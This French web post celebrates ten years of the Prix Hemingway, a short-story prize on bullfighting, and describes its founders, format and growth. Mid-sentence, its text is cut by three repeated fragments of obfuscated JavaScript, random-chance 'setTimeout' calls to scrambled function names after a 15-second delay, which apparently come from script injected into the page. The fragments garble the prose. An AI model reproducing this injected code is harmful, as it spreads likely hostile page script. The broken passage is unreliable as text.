10 ANS DE PRIX HEMINGWAY

Crée en 2004 par les Avocats du Diable sur une idée de Marion Mazauric directrice des éditions Au Diable Vauvert et de Simon Casas, le Prix Hemingway récompense chaque année une nouvelle inédite sur le thème de la tauromachie, son univers ou sa culture.

Le Prix Hemingway n’est pas un prix d’aficionados. Il n’est pas demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andé aux participants d'être pour ou contre la tauromachie mais de faire une oeuvre de littérature à partir de cet univers.

Autres particularités de ce prix, le lauréat est connu le vendredi soir, après la corrida sur la piste des arènes et certains soirs de feria, comédiens et auteurs lisent des nouvelles dans les torils des arènes. Chaque année "no hay billetes" pour entendre ces lecteurs.

En dix ans ce prix n'a cessé de progresser :

- De plus en plus d'auteurs.

- De plus en plus de nouvelles de qualité.

- De plus en plus d'auteurs venant des cinq continents.

Un prix qui a permis d'introduire des mots en feria, là où certains n'y voient que beuverie ou barbarie.

Qui sera le dixième lauréat du Prix Hemingway ?

Réponse vendredi 6 juin après la corrida.

En attendant, on peut retrouver les meilleures nouvelles dans les recueils chaque année.

Pourquoi ce prix ? Réponse de Laure Adler, la Présidente du jury : "Ce prix est né de la volonté de pouvoir réunir l'amour de la littérature et celui de la tauromachie. Noces consommées depuis si longtemps et ô combien fécondes..."

Deuxième réponse. Celle de Simon Casas, créateur et partenaire de ce prix : "Je suis convaincu que l'art tauromachique ne pourra se péréniser qu'au nom de son essence culturelle..."

Les commentaires sont fermés.